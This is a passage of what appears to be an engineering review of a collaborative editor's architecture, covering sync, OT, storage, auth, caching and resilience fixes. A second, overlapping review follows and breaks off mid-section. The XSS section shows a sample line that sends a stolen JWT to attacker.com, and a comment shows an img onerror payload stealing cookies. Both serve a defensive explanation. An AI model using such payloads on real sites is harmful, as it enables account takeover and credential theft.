└─────────────────────────────────────────────────────────┘
Solution: Operation log with periodic compaction
// Store operations, not snapshots
const schema = `
-- Append-only operation log
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
user_id UUID NOT NULL,
op_type TEXT NOT NULL, -- 'insert' | 'delete' | 'format'
position INTEGER,
content TEXT,
attributes JSONB,
vector_clock JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
);
-- PostgreSQL has no inline INDEX clause in CREATE TABLE;
-- create the sync-query indexes separately:
CREATE INDEX idx_doc_ops ON document_operations (document_id, id);
CREATE INDEX idx_doc_ops_since ON document_operations (document_id, created_at);
-- Periodic snapshots for fast loading (not primary storage)
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
snapshot_at BIGINT NOT NULL, -- operation ID at snapshot time
content JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY (document_id, snapshot_at)
);
`;
class DocumentStorage {
async applyOperation(docId, operation) {
return await this.db.transaction(async (trx) => {
// Write operation to log
const [op] = await trx('document_operations')
.insert({
document_id: docId,
...operation,
vector_clock: JSON.stringify(operation.vectorClock)
})
.returning('*');
// Check if we should create a snapshot
// (every 1000 ops or 10 minutes, whichever comes first)
await this.maybeSnapshot(docId, op.id, trx);
return op;
});
}
async loadDocument(docId, sinceOpId = null) {
if (sinceOpId) {
// Incremental sync: only fetch ops since last known state
return await this.db('document_operations')
.where('document_id', docId)
.where('id', '>', sinceOpId)
.orderBy('id', 'asc');
}
// Full load: find nearest snapshot, then apply subsequent ops
const snapshot = await this.db('document_snapshots')
.where('document_id', docId)
.orderBy('snapshot_at', 'desc')
.first();
const ops = await this.db('document_operations')
.where('document_id', docId)
.where('id', '>', snapshot?.snapshot_at ?? 0)
.orderBy('id', 'asc');
return { snapshot, ops };
}
}
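The `maybeSnapshot` policy quoted in the comment ("every 1000 ops or 10 minutes, whichever comes first") can be isolated as a pure function, which keeps it testable; the thresholds below are those quoted values, not tuned numbers:

```javascript
// Pure snapshot policy: compact the op log when replay would be too
// long (op count) or the last snapshot is too old (wall-clock age).
function shouldSnapshot({ opsSinceSnapshot, lastSnapshotAt, now,
                          maxOps = 1000, maxAgeMs = 10 * 60 * 1000 }) {
  if (opsSinceSnapshot >= maxOps) return true;
  if (now - lastSnapshotAt >= maxAgeMs) return true;
  return false;
}
```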
Trade-offs: loading a document now means replaying ops from the nearest snapshot (bounded by snapshot frequency); the append-only log grows quickly and needs compaction and archival; and the write path is more complex than a single UPDATE.
Severity: HIGH
Current polling behavior:
─────────────────────────────────────────────────────────
Server A (User A connected) Server B (User B connected)
─────────────────────────────────────────────────────────
User A types "H"
→ Saved to PostgreSQL
Server B polls... (0-2s wait)
User B sees "H" appear
(up to 2 second delay)
At scale:
10 servers × 1 poll/2sec × 1000 documents = 5,000 queries/sec
just for polling, before any real work
─────────────────────────────────────────────────────────
Solution: Redis Pub/Sub for cross-server broadcasting
// Replace polling with event-driven pub/sub
import { createClient } from 'redis';
class RealtimeSync {
constructor() {
// Separate clients required - subscriber can't do other operations
this.publisher = createClient();
this.subscriber = createClient();
this.localSockets = new Map(); // docId → Set<WebSocket>
}
async initialize() {
await this.publisher.connect();
await this.subscriber.connect();
// Subscribe to ALL document channels on this server
// Pattern subscription avoids per-document subscriptions
await this.subscriber.pSubscribe(
'doc:*',
(message, channel) => {
const docId = channel.replace('doc:', '');
this.broadcastToLocalClients(docId, JSON.parse(message));
}
);
}
async publishChange(docId, change) {
// Broadcast to all servers instantly (no polling delay)
await this.publisher.publish(
`doc:${docId}`,
JSON.stringify({
...change,
serverId: process.env.SERVER_ID, // Prevent echo to self
timestamp: Date.now()
})
);
}
broadcastToLocalClients(docId, change) {
const sockets = this.localSockets.get(docId);
if (!sockets) return;
const message = JSON.stringify(change);
for (const socket of sockets) {
// Skip sockets belonging to the originating user: their client already
// applied the edit optimistically. (This also skips that user's other
// tabs; track a per-connection id instead to avoid that.)
if (socket.userId !== change.userId && socket.readyState === WebSocket.OPEN) {
socket.send(message);
}
}
}
// Track which documents have clients on this server
registerClient(docId, socket) {
if (!this.localSockets.has(docId)) {
this.localSockets.set(docId, new Set());
}
this.localSockets.get(docId).add(socket);
}
deregisterClient(docId, socket) {
this.localSockets.get(docId)?.delete(socket);
}
}
Latency comparison:
Polling (current): 0ms ──────────────── 2000ms (average 1000ms)
Redis Pub/Sub: 0ms ── ~5ms (typical Redis latency)
Trade-offs: Redis becomes a hard dependency for real-time delivery, so it needs clustering or a degraded-mode fallback; and pub/sub is fire-and-forget, so a server that briefly drops its subscription must recover missed changes from the operation log.
Severity: HIGH — Causes document divergence between clients
Divergence scenario with current architecture:
──────────────────────────────────────────────────────────
Document state: "AC"
User A: insert 'B' at position 1 → "ABC" (op: ins(1,'B'))
User B: insert 'X' at position 1 → "AXC" (op: ins(1,'X'))
Both ops sent simultaneously. Server applies A then B:
ins(1,'B') → "ABC"
ins(1,'X') → "AXBC" ← Server state
User A receives B's op: ins(1,'X') applied to "ABC"
→ "AXBC" ✓ (accidentally correct here)
But User B receives A's op: ins(1,'B') applied to "AXC"
→ "ABXC" ✗ ← DIVERGED from server's "AXBC"
Users are now looking at different documents with no indication.
──────────────────────────────────────────────────────────
Solution: Server-side operation transformation
// Simplified OT for insert/delete operations
// (Production: use ShareDB or Yjs which handle this correctly)
class OperationTransformer {
// Transform operation A against operation B
// Returns A' such that: apply(apply(doc, B), A') = apply(apply(doc, A), B')
transform(opA, opB) {
if (opA.type === 'insert' && opB.type === 'insert') {
return this.transformInsertInsert(opA, opB);
}
if (opA.type === 'insert' && opB.type === 'delete') {
return this.transformInsertDelete(opA, opB);
}
if (opA.type === 'delete' && opB.type === 'insert') {
return this.transformDeleteInsert(opA, opB);
}
if (opA.type === 'delete' && opB.type === 'delete') {
return this.transformDeleteDelete(opA, opB);
}
}
transformInsertInsert(opA, opB) {
// If B inserts before A's position, shift A right
if (opB.position < opA.position ||
(opB.position === opA.position && opB.userId < opA.userId)) {
return { ...opA, position: opA.position + opB.content.length };
}
return opA; // B inserts after A, no adjustment needed
}
transformInsertDelete(opA, opB) {
if (opB.position + opB.length <= opA.position) {
// B's deletion ends before A's insert point: shift A left
return { ...opA, position: opA.position - opB.length };
}
if (opB.position < opA.position) {
// A's insert point fell inside the deleted range: clamp to its start
return { ...opA, position: opB.position };
}
return opA;
}
// ... additional transform cases
}
class DocumentServer {
constructor() {
this.transformer = new OperationTransformer();
// Server maintains authoritative operation history
this.opHistory = new Map(); // docId → Operation[]
}
async applyOperation(docId, incomingOp) {
const history = this.opHistory.get(docId) || [];
// Find operations that happened concurrently with this one
// (all ops the client hadn't seen when they sent this op)
const concurrentOps = history.slice(incomingOp.knownRevision);
// Transform incoming op against all concurrent ops
let transformedOp = incomingOp;
for (const concurrentOp of concurrentOps) {
transformedOp = this.transformer.transform(transformedOp, concurrentOp);
}
// Apply transformed op and assign authoritative revision
transformedOp.revision = history.length;
history.push(transformedOp);
return transformedOp; // Send this to all other clients
}
}
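To see the transform restore convergence in the "AC" divergence scenario above, here is a self-contained insert-only demo using the same tie-breaking rule as transformInsertInsert:

```javascript
// Insert-only OT demo: both sites converge when the second operation is
// transformed against the one already applied.
function applyInsert(doc, op) {
  return doc.slice(0, op.position) + op.content + doc.slice(op.position);
}

function transformInsertInsert(opA, opB) {
  // Shift A right if B inserted at or before A's position
  // (position ties broken deterministically by userId)
  if (opB.position < opA.position ||
      (opB.position === opA.position && opB.userId < opA.userId)) {
    return { ...opA, position: opA.position + opB.content.length };
  }
  return opA;
}

const base = 'AC';
const opA = { position: 1, content: 'B', userId: 'alice' };
const opB = { position: 1, content: 'X', userId: 'bob' };

// Site 1 applies A first, then B transformed against A
const site1 = applyInsert(applyInsert(base, opA), transformInsertInsert(opB, opA));
// Site 2 applies B first, then A transformed against B
const site2 = applyInsert(applyInsert(base, opB), transformInsertInsert(opA, opB));
// Both sites end at 'ABXC' despite applying the ops in opposite orders
```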
Recommendation: Don't implement OT from scratch — use ShareDB (OT-based, battle-tested) or Yjs (CRDT-based, simpler mental model). Both handle all these edge cases.
Severity: CRITICAL — Complete account takeover possible
Attack vector:
─────────────────────────────────────────────────────────
1. Attacker finds XSS vulnerability (e.g., in document
content rendered without sanitization — likely given
this stores HTML)
2. Malicious script injected:
fetch('https://attacker.com/steal?token=' +
localStorage.getItem('jwt_token'))
3. Attacker now has valid 24-hour JWT
4. Can impersonate user, access all documents
5. User has NO way to invalidate it (JWTs are stateless)
─────────────────────────────────────────────────────────
Solution: HttpOnly cookies + token rotation
// Server-side: Set tokens in HttpOnly cookies
app.post('/auth/login', async (req, res) => {
const user = await authenticateUser(req.body);
const accessToken = generateAccessToken(user, '15m'); // Short-lived
const refreshToken = generateRefreshToken(user); // Long-lived
// Store refresh token in DB for revocation capability
await db('refresh_tokens').insert({
token_hash: hash(refreshToken),
user_id: user.id,
expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000),
created_at: new Date()
});
// HttpOnly = JavaScript cannot access this cookie
// Secure = HTTPS only
// SameSite = CSRF protection
res.cookie('access_token', accessToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000 // 15 minutes
});
res.cookie('refresh_token', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
path: '/auth/refresh', // Only sent to refresh endpoint
maxAge: 30 * 24 * 60 * 60 * 1000
});
res.json({ user: sanitizeUser(user) }); // No token in response body
});
// Silent token refresh before expiry
app.post('/auth/refresh', async (req, res) => {
const refreshToken = req.cookies.refresh_token;
if (!refreshToken) return res.status(401).json({ error: 'No refresh token' });
// Check token hasn't been revoked
const stored = await db('refresh_tokens')
.where('token_hash', hash(refreshToken))
.where('expires_at', '>', new Date())
.whereNull('revoked_at')
.first();
if (!stored) {
// Possible token theft. `stored` is null here, so re-query without the
// expiry/revocation filters to find the token's owner, then revoke all
// of that user's sessions.
const compromised = await db('refresh_tokens')
.where('token_hash', hash(refreshToken))
.first();
if (compromised) await revokeAllUserSessions(compromised.user_id);
return res.status(401).json({ error: 'Invalid refresh token' });
}
// Rotate refresh token (detect replay attacks)
await db('refresh_tokens')
.where('id', stored.id)
.update({ revoked_at: new Date() });
const newAccessToken = generateAccessToken(stored.user_id, '15m');
const newRefreshToken = generateRefreshToken(stored.user_id);
await db('refresh_tokens').insert({
token_hash: hash(newRefreshToken),
user_id: stored.user_id,
expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000)
});
res.cookie('access_token', newAccessToken, { httpOnly: true, secure: true, sameSite: 'strict' });
res.cookie('refresh_token', newRefreshToken, {
httpOnly: true, secure: true, sameSite: 'strict', path: '/auth/refresh'
});
res.json({ ok: true });
});
Trade-offs: cookie-based auth requires CSRF protection (SameSite=strict helps but breaks some legitimate cross-site flows), complicates native/mobile and third-party API clients, and the refresh-token table puts a database read on the token-refresh path.
Severity: CRITICAL
// Current: storing and rendering raw HTML is dangerous
// A user can embed: <script>stealAllDocuments()</script>
// Or: <img src="x" onerror="exfiltrate(document.cookie)">
// Solution: Never store or render raw HTML
// Use a structured document format instead
// Store as structured JSON (like ProseMirror/Slate schema)
const documentSchema = {
type: 'doc',
content: [
{
type: 'paragraph',
attrs: { align: 'left' },
content: [
{ type: 'text', text: 'Hello world', marks: [{ type: 'bold' }] }
]
}
]
};
// When rendering, use a whitelist-based renderer
// that ONLY renders known-safe node types
class SafeRenderer {
ALLOWED_NODES = new Set(['doc', 'paragraph', 'text', 'heading',
'bulletList', 'listItem', 'codeBlock']);
ALLOWED_MARKS = new Set(['bold', 'italic', 'underline', 'code', 'link']);
ALLOWED_LINK_PROTOCOLS = new Set(['https:', 'http:', 'mailto:']);
render(node) {
if (!this.ALLOWED_NODES.has(node.type)) {
console.warn(`Blocked disallowed node type: ${node.type}`);
return ''; // Drop unknown nodes entirely
}
// ... render each node type explicitly
}
renderMark(mark, content) {
if (!this.ALLOWED_MARKS.has(mark.type)) return content;
if (mark.type === 'link') {
let url;
try {
url = new URL(mark.attrs.href); // throws on relative or malformed URLs
} catch {
return content; // drop the link markup, keep the text
}
if (!this.ALLOWED_LINK_PROTOCOLS.has(url.protocol)) return content;
// Note: rel="noopener noreferrer" prevents tab-napping
return `<a href="${escapeHtml(mark.attrs.href)}"
rel="noopener noreferrer"
target="_blank">${content}</a>`;
}
// ... other marks
}
}
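The `escapeHtml` helper used in renderMark is assumed; a minimal version covering the five characters that can break out of a text node or a double-quoted attribute value:

```javascript
// Escape the five characters that matter in HTML text nodes and
// double-quoted attribute values.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;') // must run first so later entities survive
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```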
Severity: CRITICAL
Catastrophic scenario:
─────────────────────────────────────────────────────────
User A: GET /api/documents/secret-doc
→ CloudFront caches response for 5 minutes
User B (different org, no access): GET /api/documents/secret-doc
→ CloudFront serves cached response ← CONFIDENTIAL DATA LEAK
─────────────────────────────────────────────────────────
Solution: Never cache authenticated API responses at CDN
// Middleware to set correct cache headers on ALL API responses
app.use('/api', (req, res, next) => {
// Prevent any caching of API responses
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, private',
'Pragma': 'no-cache',
'Surrogate-Control': 'no-store', // CDN-specific header
'CDN-Cache-Control': 'no-store' // CloudFront specific
});
next();
});
// CDN should ONLY cache:
// - Static assets (JS, CSS, images) → long cache + content hash filenames
// - Public, unauthenticated content only
// - Never anything with Authorization header or session cookies
// CloudFront behavior configuration (infrastructure as code):
const cloudFrontConfig = {
behaviors: [
{
pathPattern: '/api/*',
cachePolicyId: 'CACHING_DISABLED', // AWS managed policy
originRequestPolicyId: 'ALL_VIEWER', // Forward all headers
},
{
pathPattern: '/static/*',
cachePolicyId: 'CACHING_OPTIMIZED',
// Static assets use content-hash filenames: main.a3f8b2.js
// Safe to cache for 1 year
}
]
};
Severity: HIGH — Changes lost on any network hiccup
Current behavior on disconnect:
─────────────────────────────────────────────────────────
User types 500 chars → network blip for 3 seconds
→ WebSocket drops
→ Those 500 chars are GONE (never reached server)
→ User doesn't know
→ User continues typing on now-stale document
→ Reconnects to DIFFERENT server (round-robin LB)
→ Server has no knowledge of this client's state
→ Document state is now inconsistent
─────────────────────────────────────────────────────────
Solution: Client-side operation queue with acknowledgments
class ResilientWebSocketClient {
constructor(url) {
this.url = url;
this.pendingOps = []; // Ops sent but not acknowledged
this.unsentOps = []; // Ops not yet sent
this.lastServerRevision = 0;
this.reconnectDelay = 1000;
this.maxReconnectDelay = 30000;
this.connected = false;
}
connect() {
this.ws = new WebSocket(this.url);
this.ws.onopen = () => {
this.connected = true;
this.reconnectDelay = 1000; // Reset backoff
// Rejoin document with last known state
// Server can send us everything we missed
this.ws.send(JSON.stringify({
type: 'rejoin',
documentId: this.documentId,
lastKnownRevision: this.lastServerRevision
}));
// Resend any unacknowledged operations
this.flushPendingOps();
};
this.ws.onmessage = (event) => {
const msg = JSON.parse(event.data);
if (msg.type === 'ack') {
// Server confirmed receipt - remove from pending
this.pendingOps = this.pendingOps.filter(op => op.id !== msg.opId);
this.lastServerRevision = msg.revision;
} else if (msg.type === 'operation') {
this.handleRemoteOperation(msg);
} else if (msg.type === 'catchup') {
// Server sending us ops we missed during disconnect
msg.operations.forEach(op => this.handleRemoteOperation(op));
}
};
this.ws.onclose = () => {
this.connected = false;
this.scheduleReconnect();
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
// onclose will fire after onerror, triggering reconnect
};
}
sendOperation(op) {
const envelope = {
...op,
id: generateId(), // any unique-ID helper, e.g. crypto.randomUUID()
clientRevision: this.lastServerRevision
};
if (this.connected) {
this.pendingOps.push(envelope);
this.ws.send(JSON.stringify(envelope));
} else {
// Queue for when connection restores
this.unsentOps.push(envelope);
}
}
flushPendingOps() {
// Resend ops that were sent but not acknowledged
for (const op of this.pendingOps) {
this.ws.send(JSON.stringify(op));
}
// Send ops that were queued while disconnected
for (const op of this.unsentOps) {
this.pendingOps.push(op);
this.ws.send(JSON.stringify(op));
}
this.unsentOps = [];
}
scheduleReconnect() {
setTimeout(() => {
this.reconnectDelay = Math.min(
this.reconnectDelay * 2, // Exponential backoff
this.maxReconnectDelay
);
this.connect();
}, this.reconnectDelay + Math.random() * 1000); // Jitter prevents thundering herd
}
}
Severity: HIGH
Round-robin load balancing with WebSockets:
─────────────────────────────────────────────────────────
Client connects to Server A → WebSocket established
Client's HTTP request (token refresh) → routed to Server B
Server B has no WebSocket context for this client
Server A goes down → client reconnects to Server B
Server B has no document state for this client
─────────────────────────────────────────────────────────
Solution: Sticky sessions OR stateless WebSocket servers
Option 1: Sticky sessions (simpler, less resilient)
─────────────────────────────────────────────────────────
Load Balancer config:
- Hash client IP or session ID
- Always route same client to same server
- Problem: server failure still drops all its connections
- Problem: uneven load distribution
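The hash-routing idea behind sticky sessions can be sketched in a few lines. The hash function and helper names below are illustrative, not any particular load balancer's implementation:

```javascript
// Deterministic client → server routing via a simple string hash (FNV-1a).
// Real load balancers (e.g. NGINX's ip_hash) do the equivalent internally.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0; // 32-bit FNV prime multiply
  }
  return h;
}

function routeClient(clientKey, serverCount) {
  // Same key always maps to the same server index
  return fnv1a(clientKey) % serverCount;
}
```

The trade-offs above follow directly from this sketch: if a server dies, every key that hashed to it must be re-routed, and a hot range of client IPs can skew load onto one server.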
Option 2: Stateless WebSocket servers (recommended)
─────────────────────────────────────────────────────────
All connection state stored in Redis:
- Active document sessions
- Client cursor positions
- Pending operations per client
- Any server can handle any client
┌─────────┐ ┌─────────────────────────────────┐
│ Client │────▶│ Any WebSocket Server │
└─────────┘ │ (stateless - reads from Redis) │
└──────────────┬──────────────────┘
│
┌──────────▼──────────┐
│ Redis Cluster │
│ - Session state │
│ - Pub/Sub channels │
│ - Op queues │
└─────────────────────┘
Severity: HIGH — Will become bottleneck at scale
Current write pattern per keystroke:
─────────────────────────────────────────────────────────
User types one character:
1. INSERT into document_changes (PostgreSQL write)
2. 9 other servers poll SELECT (PostgreSQL reads × 9)
3. Repeat for every character typed by every user
At 100 concurrent users typing at 3 chars/sec:
- 300 writes/sec
- Each change row is read by every other server's poll: 300 × (N-1) row reads/sec
- At 10 servers: 2,700 row reads/sec just for polling
- Polling reads compete with document load queries
─────────────────────────────────────────────────────────
Solution: Separate concerns — PostgreSQL for durability, Redis for real-time
Revised data flow:
─────────────────────────────────────────────────────────
User types → WebSocket → Server
├──▶ Redis Pub/Sub (real-time broadcast, ~1ms)
└──▶ Operation log buffer
│
└──▶ Batch write to PostgreSQL
(every 100ms or 50 ops)
─────────────────────────────────────────────────────────
Benefits:
- Real-time path: Redis only (fast, no DB load)
- Durability path: PostgreSQL (batched, efficient)
- Separation allows independent scaling
class OperationBuffer {
constructor() {
this.buffer = new Map(); // docId → Operation[]
this.flushInterval = setInterval(() => this.flush(), 100);
// Flush on shutdown to prevent data loss
process.on('SIGTERM', async () => {
clearInterval(this.flushInterval);
await this.flush();
process.exit(0);
});
}
add(docId, operation) {
if (!this.buffer.has(docId)) {
this.buffer.set(docId, []);
}
this.buffer.get(docId).push(operation);
// Immediate flush if buffer is large
if (this.buffer.get(docId).length >= 50) {
// Fire and forget; flushDocument re-buffers the ops if the insert fails
this.flushDocument(docId).catch(err => console.error('flush failed', err));
}
}
async flush() {
const promises = [];
for (const docId of this.buffer.keys()) {
promises.push(this.flushDocument(docId));
}
await Promise.allSettled(promises); // one document's failed flush shouldn't abort the others
}
async flushDocument(docId) {
const ops = this.buffer.get(docId);
if (!ops || ops.length === 0) return;
this.buffer.set(docId, []); // Clear before async op to avoid double-write
try {
// Bulk insert is much more efficient than individual inserts
await db('document_operations').insert(ops);
} catch (error) {
// Put ops back in buffer for retry
const current = this.buffer.get(docId) || [];
this.buffer.set(docId, [...ops, ...current]);
throw error;
}
}
}
Severity: MEDIUM
Problem with org-based partitioning:
─────────────────────────────────────────────────────────
Google (org_id: 1) has 50,000 employees all editing docs
→ All their data on one partition → overloaded
Startup (org_id: 2) has 5 employees
→ Their partition is nearly idle
Result: Uneven load, one partition becomes bottleneck
regardless of adding more hardware
─────────────────────────────────────────────────────────
Solution: Composite partition key with consistent hashing
-- Partition by document_id (UUID) for even distribution
-- Keep org_id for efficient org-level queries via index
CREATE TABLE documents (
id UUID DEFAULT gen_random_uuid(),
org_id UUID NOT NULL,
title TEXT,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (id); -- Even distribution regardless of org size
-- Create partitions
CREATE TABLE documents_p0 PARTITION OF documents
FOR VALUES WITH (modulus 8, remainder 0);
-- ... through documents_p7
-- Efficient org-level queries still possible via index
CREATE INDEX idx_documents_org ON documents (org_id, created_at DESC);
-- For operation log, partition by document_id + time range
-- This enables efficient pruning of old operations
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
-- ... other columns
) PARTITION BY RANGE (created_at);
-- Monthly partitions enable easy archival
CREATE TABLE document_operations_2024_01
PARTITION OF document_operations
FOR VALUES FROM ('2024-01-01') TO ('2024-02-01');
Severity: MEDIUM
// Without connection pooling, each server opens many DB connections
// PostgreSQL has hard limits (default max_connections = 100, often raised to ~500)
// 20 servers × 50 connections each = 1,000 connections → new connections refused, errors cascade
// Solution: PgBouncer as connection pooler
// Architecture:
// App Servers → PgBouncer (transaction pooling) → PostgreSQL
//
// PgBouncer in transaction mode:
// - 20 servers can share 20 actual DB connections
// - Connections returned to pool after each transaction
// - PostgreSQL sees manageable connection count
// Application configuration
const pool = new Pool({
host: 'pgbouncer', // Point to PgBouncer, not PostgreSQL directly
max: 10, // Per-server pool size (PgBouncer multiplexes these)
idleTimeoutMillis: 30000,
connectionTimeoutMillis: 2000,
// Note: PgBouncer's transaction mode doesn't support session state such as
// named prepared statements - avoid passing `name` to pool.query()
statement_timeout: 5000, // fail fast on queries that hang
});
// Monitor pool health
pool.on('error', (err) => {
logger.error('Unexpected pool error', err);
metrics.increment('db.pool.error');
});
Severity: MEDIUM — Core feature gap
// Users can't see each other's cursors/selections
// This is a fundamental collaborative editing feature
class PresenceManager {
constructor(redis) {
this.redis = redis;
this.PRESENCE_TTL = 30; // seconds
}
async updatePresence(docId, userId, presenceData) {
const key = `presence:${docId}:${userId}`;
await this.redis.setEx(
key,
this.PRESENCE_TTL,
JSON.stringify({
userId,
cursor: presenceData.cursor, // { paragraph, offset }
selection: presenceData.selection, // { anchor, head }
color: presenceData.color, // Assigned color for this user
name: presenceData.displayName,
lastSeen: Date.now()
})
);
// Notify other clients of presence update
await this.redis.publish(
`presence:${docId}`,
JSON.stringify({ type: 'presence_update', userId, ...presenceData })
);
}
async getDocumentPresence(docId) {
const pattern = `presence:${docId}:*`;
// KEYS blocks Redis and scans the whole keyspace; acceptable in a sketch,
// but use SCAN (or a per-document set of user IDs) in production
const keys = await this.redis.keys(pattern);
if (keys.length === 0) return [];
const values = await this.redis.mGet(keys);
return values
.filter(Boolean)
.map(v => JSON.parse(v));
}
async removePresence(docId, userId) {
await this.redis.del(`presence:${docId}:${userId}`);
await this.redis.publish(
`presence:${docId}`,
JSON.stringify({ type: 'presence_leave', userId })
);
}
}
Severity: HIGH — Cascading failure risk
import CircuitBreaker from 'opossum';
// Without circuit breakers:
// PostgreSQL slows down → all requests wait → servers exhaust threads
// → entire application becomes unresponsive
// → users see spinning wheels, not helpful errors
const dbCircuitBreaker = new CircuitBreaker(
async (query) => await db.raw(query),
{
timeout: 3000, // Call fails if takes longer than 3s
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30s
volumeThreshold: 10, // Minimum calls before evaluating
}
);
dbCircuitBreaker.fallback(async (query) => {
// Degraded mode: serve from cache if available
// (hash() is an assumed helper, e.g. a SHA-1 of the query text)
const cached = await redis.get(`query_cache:${hash(query)}`);
if (cached) {
metrics.increment('circuit_breaker.cache_hit');
return JSON.parse(cached);
}
// Return meaningful error instead of hanging
throw new ServiceUnavailableError(
'Document service temporarily unavailable. Your changes are saved locally.'
);
});
dbCircuitBreaker.on('open', () => {
logger.error('DB circuit breaker OPEN - database unreachable');
alerting.critical('Database circuit breaker opened');
});
dbCircuitBreaker.on('halfOpen', () => {
logger.info('DB circuit breaker testing recovery');
});
dbCircuitBreaker.on('close', () => {
logger.info('DB circuit breaker closed - database recovered');
});
┌────────────────────────────────────────────────────────────────────────┐
│ PRIORITY MATRIX │
├──────────────────────────────────────┬────────────┬────────────────────┤
│ Issue │ Severity │ Fix Complexity │
├──────────────────────────────────────┼────────────┼────────────────────┤
│ CDN caching authenticated responses │ CRITICAL │ Low (config change)│
│ JWT in localStorage (XSS) │ CRITICAL │ Medium │
│ HTML storage (XSS injection) │ CRITICAL │ High │
│ LWW with client clocks │ CRITICAL │ High (CRDT/OT) │
│ No OT/CRDT (document divergence) │ HIGH │ High │
│ 2-second polling │ HIGH │ Medium (Redis) │
│ No WebSocket reconnection │ HIGH │ Medium │
│ Full snapshot storage (data loss) │ HIGH │ High │
│ No circuit breakers │ HIGH │ Low (library) │
│ LB breaks WebSocket routing │ HIGH │ Medium │
│ PostgreSQL as message bus │ HIGH │ Medium │
│ Hot partition (org-based) │ MEDIUM │ Medium │
│ No connection pooling │ MEDIUM │ Low (PgBouncer) │
│ No presence/cursor sync │ MEDIUM │ Medium │
│ No graceful degradation │ MEDIUM │ Low (library) │
│ 24h JWT expiry (too long) │ MEDIUM │ Low │
│ No operation acknowledgment │ MEDIUM │ Medium │
│ No audit log │ LOW │ Low (side effect │
│ │ │ of op log) │
└──────────────────────────────────────┴────────────┴────────────────────┘
Week 1 — Fix critical security issues (no architectural changes required):
1. Move CDN to never cache /api/* routes
2. Migrate JWT to HttpOnly cookies
3. Sanitize document content (stop storing raw HTML)
Week 2-3 — Fix data integrity:
4. Integrate Yjs for CRDT-based sync
5. Switch to operation log storage
6. Add Redis Pub/Sub (eliminate polling)
Week 4-5 — Fix resilience:
7. Implement WebSocket reconnection with op queue
8. Add circuit breakers
9. Deploy PgBouncer
Week 6+ — Scaling improvements:
10. Stateless WebSocket servers
11. Fix partition strategy
12. Add presence/cursor sync
The three issues you can fix today with no architectural changes (CDN caching, localStorage JWT, HTML injection) are also the three that could cause immediate catastrophic data breaches. Start there.
The proposed architecture has several critical flaws that would lead to data loss, poor performance, and a broken user experience. Here is a detailed breakdown of the failure modes, race conditions, and bottlenecks, along with specific solutions and their trade-offs.
Issue: Last-Write-Wins (LWW) with Client Clocks This is the most critical flaw. Client clocks are not reliable or synchronized. Using them for conflict resolution is a recipe for data loss and bizarre, unpredictable behavior.
Solution: Use a Centralized, Monotonic Sequencing System Abandon client timestamps entirely. The server must be the single source of truth for ordering events.
Trade-offs:
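A minimal sketch of what "the server is the single source of truth for ordering" means in practice; the class and method names here are assumptions, not a prescribed API:

```javascript
// The server assigns a monotonically increasing revision per document.
// Clients submit the revision they last saw, so stale edits are detectable
// without ever trusting a client clock.
class DocumentSequencer {
  constructor() {
    this.revisions = new Map(); // docId → latest revision number
  }

  // Assign and return the next revision for an incoming operation.
  assign(docId) {
    const next = (this.revisions.get(docId) || 0) + 1;
    this.revisions.set(docId, next);
    return next;
  }

  // True if the client's view of the document is behind the server's.
  isStale(docId, clientRevision) {
    return clientRevision < (this.revisions.get(docId) || 0);
  }
}
```

A stale submission is then transformed (OT) or merged (CRDT) rather than blindly applied, which is where the real complexity lives.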
Issue: Broadcasting Only to Clients on the Same Server This architecture creates "islands" of users. A change made by a user on Server A will be instantly visible to others on Server A, but users on Servers B, C, and D won't see it until their server polls Postgres (up to 2 seconds later). This is an unacceptable delay for real-time collaboration and breaks the "real-time" illusion.
Scaling Bottleneck: The system cannot scale horizontally without introducing this massive latency and inconsistency.
Solution: Introduce a Pub/Sub Messaging Layer Introduce a dedicated, fast Pub/Sub system like Redis Pub/Sub or Apache Kafka.
Servers publish each change to a per-document channel (e.g., document:123); every server subscribed to document:123 relays the change to its local WebSocket clients. Trade-offs:
Issue: Other Servers Polling PostgreSQL Polling the database every 2 seconds is a terrible scaling anti-pattern.
Solution: The Pub/Sub solution above completely eliminates the need for this poll. The Pub/Sub system becomes the real-time event bus, and the database is used for persistence and as the source of truth for the current full state.
Issue: Saving Full HTML Snapshots Every 30 Seconds This is extremely inefficient.
Solution: Store a History of Operations (Event Sourcing)
Instead of storing snapshots, store every atomic operation (e.g., {type: 'insert', index: 42, text: 'a'}).
Trade-offs:
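To make the event-sourcing idea concrete, here is a minimal replay function for operations shaped like the example above; the exact operation schema is an assumption:

```javascript
// Rebuild a document from an empty string by replaying its operation log.
// Assumed op shapes: {type:'insert', index, text} and {type:'delete', index, length}.
function replay(ops) {
  let doc = '';
  for (const op of ops) {
    if (op.type === 'insert') {
      doc = doc.slice(0, op.index) + op.text + doc.slice(op.index);
    } else if (op.type === 'delete') {
      doc = doc.slice(0, op.index) + doc.slice(op.index + op.length);
    }
  }
  return doc;
}
```

Periodic snapshots then exist only to bound replay time: load the latest snapshot and replay the ops recorded after it.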
Issue: JWT Tokens Stored in localStorage
localStorage is vulnerable to XSS (Cross-Site Scripting) attacks. If a malicious script is injected into your React app (e.g., via a third-party library), it can steal the JWT token, giving an attacker full access to the user's account for 24 hours.
Solution: Store JWTs in httpOnly Cookies
